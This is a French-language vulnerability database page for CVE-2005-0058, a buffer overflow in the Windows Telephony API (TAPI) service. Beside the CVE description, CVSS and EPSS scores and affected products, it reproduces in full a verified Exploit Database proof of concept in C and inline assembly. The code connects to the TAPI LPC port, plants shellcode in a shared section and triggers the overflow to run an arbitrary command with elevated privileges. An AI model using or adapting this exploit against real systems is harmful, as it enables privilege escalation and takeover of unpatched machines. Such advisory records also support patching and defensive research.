CVE-2005-0058 : Détail

CVE-2005-0058

21.42%V4
Network
2005-08-10
02h00 +00:00
2018-10-12
17h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in the Telephony Application Programming Interface (TAPI) for Microsoft Windows 98, Windows 98 SE, Windows ME, Windows 2000, Windows XP, and Windows Server 2003 allows attackers to elevate privileges or execute arbitrary code via a crafted message.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 1584

Date de publication : 2006-03-13 23h00 +00:00
Auteur : Cesar Cerrudo
EDB Vérifié : Yes

// by Cesar Cerrudo - Argeniss - www.argeniss.com // // TAPI Vulnerability- MS05-040 // // Should work on Win2k sp0,sp1,sp2,sp3,sp4 any language // If Telephony Service is not running you can start it by net start "Telephony Service" #include "windows.h" #include "stdio.h" #include "tapi.h" typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING; typedef struct LpcSectionMapInfo{ DWORD Length; DWORD SectionSize; DWORD ServerBaseAddress; } LPCSECTIONMAPINFO; typedef struct LpcSectionInfo { DWORD Length; HANDLE SectionHandle; DWORD Param1; DWORD SectionSize; DWORD ClientBaseAddress; DWORD ServerBaseAddress; } LPCSECTIONINFO; #define SHARED_SECTION_SIZE 0x1000 typedef struct _OBJDIR_INFORMATION { UNICODE_STRING ObjectName; UNICODE_STRING ObjectTypeName; BYTE Data[1]; } OBJDIR_INFORMATION; typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; UNICODE_STRING *ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES; #define InitializeObjectAttributes( p, n, a, r, s ) { \ (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ (p)->RootDirectory = r; \ (p)->Attributes = a; \ (p)->ObjectName = n; \ (p)->SecurityDescriptor = s; \ (p)->SecurityQualityOfService = NULL; \ } WCHAR * uString=(WCHAR *) HeapAlloc(GetProcessHeap(), 0, 0x100); LPVOID lpLocalAddress,lpTargetAddress; DWORD ConnectToLPCPort(){ HMODULE hNtdll; HANDLE hPort; LPCSECTIONINFO sectionInfo; LPCSECTIONMAPINFO mapInfo; byte ConnectDataBuffer[100]; DWORD Size = sizeof(ConnectDataBuffer); WCHAR * uString=L"\\RPC Control\\tapsrvlpc";//TAPI LPC port DWORD i; UNICODE_STRING uStr; for (i=0;i<100;i++) ConnectDataBuffer[i]=0x0; hNtdll=LoadLibrary("ntdll.dll"); DWORD (WINAPI * pfnNtConnectPort)(HANDLE*,UNICODE_STRING * ,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*); pfnNtConnectPort= (DWORD (WINAPI *)(HANDLE* ,UNICODE_STRING *,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*))GetProcAddress(hNtdll,"NtConnectPort"); DWORD (WINAPI * pfnCreateSection)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD); pfnCreateSection= (DWORD (WINAPI *)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD))GetProcAddress(hNtdll,"NtCreateSection"); HANDLE hSection; LARGE_INTEGER SecSize; DWORD maxSize=0; SecSize.LowPart=0x1000; SecSize.HighPart=0x0; SECURITY_QUALITY_OF_SERVICE qos; DWORD qosSize=4; qos.Length =(DWORD)&qosSize; qos.ImpersonationLevel =(_SECURITY_IMPERSONATION_LEVEL)0x2; qos.ContextTrackingMode =0x01000101; qos.EffectiveOnly =0x10000; //create shared section pfnCreateSection(&hSection,SECTION_ALL_ACCESS,NULL,&SecSize,PAGE_READWRITE,SEC_COMMIT ,NULL); memset(&sectionInfo, 0, sizeof(sectionInfo)); memset(&mapInfo, 0, sizeof(mapInfo)); sectionInfo.Length = 0x18; sectionInfo.SectionHandle =hSection; sectionInfo.SectionSize = SHARED_SECTION_SIZE; mapInfo.Length = 0x0C; uStr.Length = wcslen(uString)*2; uStr.MaximumLength = wcslen(uString)*2+2; uStr.Buffer =uString; //connect to LPC port if (!pfnNtConnectPort(&hPort,&uStr,&qos,(DWORD *)&sectionInfo,(DWORD *)&mapInfo,&maxSize,(DWORD*)ConnectDataBuffer,&Size)){ lpLocalAddress =(LPVOID)sectionInfo.ClientBaseAddress ; lpTargetAddress =(LPVOID)sectionInfo.ServerBaseAddress ; return 1; } return 0; } int main(int argc, char* argv[]) { HMODULE hKernel; DWORD iStrLen; FARPROC pWinExec,pExitThread; LPSTR sCommand; if (!argv[1]) { printf("\nUsage :\n TapiExploit \"command\" \n"); printf("\nExample :\n TapiExploit \"cmd.exe\" \n"); exit(0); } iStrLen=strlen(argv[1]); if(iStrLen>=65){ printf("\n\"command\" must be less than 65 chars.\n"); exit(0); } sCommand=argv[1]; if (!ConnectToLPCPort()){ //connect to TAPI LPC port printf("Could not connect to LPC port \nTAPI service couldn't be running\nTry again."); exit(0); } hKernel=LoadLibrary("Kernel32.dll"); // pWinExec=GetProcAddress(hKernel,"WinExec"); pWinExec=GetProcAddress(hKernel,"CreateProcessA"); pExitThread=GetProcAddress(hKernel,"ExitThread"); CHAR sWinSta[]="WinSta0\\Default"; //copy shellcode _asm { pushad lea esi, Shellcode mov edi, lpLocalAddress add edi, 0x10 lea ecx, End sub ecx, esi push esi push edi cld rep movsb pop edi pop esi push edi lea ecx, CommandBuf sub ecx, esi add edi, ecx mov esi, sCommand mov ecx, iStrLen rep movsb mov [edi], 0x00 pop edi mov esi, pWinExec mov [edi+0x0a], esi mov esi, pExitThread mov [edi+0x0e], esi ////////////// add edi, 0x2f0 lea esi, sWinSta mov ecx, 0xf cld rep movsb /////////////// jmp Done Shellcode: jmp Start // this gets overwritten mov ax,0xffff mov ax,0xffff mov ax,0xffff mov ax,0xffff CommandBuf: // this gets overwritten mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 Start: call getDelta getDelta: pop edx // Get shellcode/shared section pointer push edx /* push 0x1 // push 0x0 for hidden window lea eax, [edx-0x47] push eax // Command offset call [edx-0x4f] // Call WinExec */ mov eax, edx add eax,0x500 push eax //LPPROCESS_INFORMATION add eax, 0x100 mov ebx, edx xor bl, bl lea ecx, [ebx+0x300] lea ebx, [eax+0x8] mov [ebx], ecx //set windows station and desktop push eax //LPSTARTUPINFO push 0x0 push 0x0 push 0x0 push 0x0 push 0x0 push 0x0 lea eax, [edx-0x47] push eax // Command offset push 0x0 call [edx-0x4f] // Call create process pop edx call [edx-0x4b] // Call ExitThread End: Done: popad } LPSTR lpszAppFilename=(LPSTR )HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x21C) ; LINEEXTENSIONID ExtensionID; memset(lpszAppFilename,0x58,0x21A); _asm{ pushad mov ebx, lpszAppFilename lea ebx, [ebx+0x216] mov eax, lpTargetAddress add eax, 0x10 mov [ebx], eax popad } lineSetAppPriorityW((LPWSTR )lpszAppFilename,NULL,&ExtensionID,LINEREQUESTMODE_MAKECALL,NULL,NULL); Sleep(1000); printf("Command should have been executed ;)\n"); return 0; } // milw0rm.com [2006-03-14]

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2003_server >> Version r2

    Microsoft>>Windows_98 >> Version *

    Microsoft>>Windows_98se >> Version *

    Microsoft>>Windows_me >> Version *

    Microsoft>>Windows_xp >> Version *

    Références

    http://www.securityfocus.com/bid/14518
    Tags : vdb-entry, x_refsource_BID
    http://securitytracker.com/id?1014639
    Tags : vdb-entry, x_refsource_SECTRACK
    http://secunia.com/advisories/16354/
    Tags : third-party-advisory, x_refsource_SECUNIA